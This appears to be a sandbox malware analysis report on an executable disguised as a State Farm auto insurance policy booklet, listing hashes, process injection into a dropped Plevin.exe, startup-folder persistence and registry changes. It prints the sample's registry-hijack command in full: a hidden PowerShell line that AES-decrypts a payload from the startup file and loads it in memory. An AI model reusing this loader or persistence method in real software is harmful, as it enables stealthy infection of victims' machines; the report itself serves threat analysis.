Analysis
  Max time kernel: 114s
  Max time network: 43s
  Platform: windows7_x64
  Resource: win7-20220414-en
  Submitted: 10-06-2022 17:29
Static task: static1
Behavioral task: behavioral1
  Sample: State-Farm-Auto-Insurance-Policy-Booklet.exe
  Resource: win7-20220414-en
Behavioral task: behavioral2
  Sample: State-Farm-Auto-Insurance-Policy-Booklet.exe
  Resource: win10v2004-20220414-en
General
  Target: State-Farm-Auto-Insurance-Policy-Booklet.exe
  Size: 266.0MB
  MD5: 3a015f8d7013c0fef3322e08cd41b565
  SHA1: b4d03c21ff99aceb0023ec581e953b17ad541580
  SHA256: 29014a3438c174c2e7377168adf62080e7566e1664c1b639e454a9ad961b5fde
  SHA512: f97e2b80eb0b00351c406df2a455d3dfe214925aada81455c5d40924a613ef883119a365978b50882a35fb27635c5937af0da7a8a5f91074eefa6eaba10518bf
Malware Config
Signatures
- Executes dropped EXE (1 IoCs)
  Processes:
    pid 1616, process Plevin.exe
- Drops startup file (1 IoCs)
  Processes:
    State-Farm-Auto-Insurance-Policy-Booklet.exe:
      File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SXuGZcKhlvoTHGcRbriizwmgfiNLw.zZAHomszxsi
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Modifies registry class (7 IoCs)
  Processes:
    State-Farm-Auto-Insurance-Policy-Booklet.exe:
      Key created: \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\yvlobsgsdlyfg\shell\open\command
      Key created: \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\yvlobsgsdlyfg
      Key created: \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\yvlobsgsdlyfg\shell
      Key created: \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\yvlobsgsdlyfg\shell\open
      Set value (str): \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\yvlobsgsdlyfg\shell\open\command\ = "powershell -windowstyle hidden -command \"$AC=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$AC.Key=[Convert]::FromBase64String('SjQDQJXpF0XycaMaRqevDN2rb/N/xhU/qpHAQAoW3lk=');$EB=[Convert]::FromBase64String([IO.File]::ReadAllText([System.Text.Encoding]::Utf8.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcQWRtaW5cQXBwRGF0YVxSb2FtaW5nXE1pY3Jvc29mdFxXaW5kb3dzXFN0YXJ0IE1lbnVcUHJvZ3JhbXNcU3RhcnR1cFxTWHVHWmNLaGx2b1RIR2NSYnJpaXp3bWdmaU5Mdy56WkFIb21zenhzaQ=='))));$AC.IV = $EB[0..15];$Decryptor=$AC.CreateDecryptor();$UB=$Decryptor.TransformFinalBlock($EB, 16, $EB.Length-16);$AC.Dispose();[Reflection.Assembly]::Load($UB);[Q3L_Glan_Vtc1CPJQkQ70yXjuL3TzE3TZiJsfOSs5gAmyjm5oU53X8JV6OwMDTyztRqYI6.sw9snxC2eLnjjajXWtqtVxBDr52u5]::QfDGsg3D06Lqj7gwQVoPIisR72G4p2enJJGE9();\""
      Key created: \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\.zzahomszxsi
      Set value (str): \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\.zzahomszxsi\ = "yvlobsgsdlyfg"
- Suspicious use of WriteProcessMemory (7 IoCs)
  Processes:
    State-Farm-Auto-Insurance-Policy-Booklet.exe (pid / description / process -> target process):
      PID 2016 wrote to memory of 1616: State-Farm-Auto-Insurance-Policy-Booklet.exe -> Plevin.exe
      PID 2016 wrote to memory of 1616: State-Farm-Auto-Insurance-Policy-Booklet.exe -> Plevin.exe
      PID 2016 wrote to memory of 1616: State-Farm-Auto-Insurance-Policy-Booklet.exe -> Plevin.exe
      PID 2016 wrote to memory of 1616: State-Farm-Auto-Insurance-Policy-Booklet.exe -> Plevin.exe
      PID 2016 wrote to memory of 1360: State-Farm-Auto-Insurance-Policy-Booklet.exe -> State-Farm-Auto-Insurance-Policy-Booklet.exe
      PID 2016 wrote to memory of 1360: State-Farm-Auto-Insurance-Policy-Booklet.exe -> State-Farm-Auto-Insurance-Policy-Booklet.exe
      PID 2016 wrote to memory of 1360: State-Farm-Auto-Insurance-Policy-Booklet.exe -> State-Farm-Auto-Insurance-Policy-Booklet.exe
Processes
  C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe"
    PID: 2016
    - Suspicious use of WriteProcessMemory
    C:\Users\Admin\AppData\Local\Temp\Plevin.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\Plevin.exe"
      PID: 1616
      - Executes dropped EXE
    C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe" /s
      PID: 1360
      - Drops startup file
      - Modifies registry class
Network
MITRE ATT&CK Enterprise v6
Downloads
  Filesize: 997KB
  MD5: dbc534854dd385e59a3f1906ddfb9020
  SHA1: 2b3062d82232ce10a8713829199769ff0d12e0fc
  SHA256: 06486febb76aaa7bf469ba1bf46a92c4eafc42a5626646184e8865c862d09dd0
  SHA512: 1506fbc8fca0a3ca06e24fdae2fb9e8cb345fd6197f5cbbaa990490cc20a25b72906ab9668725f29c0bfce6528bd7dca5dc15ca0ac3c0327d1876e58e3d47951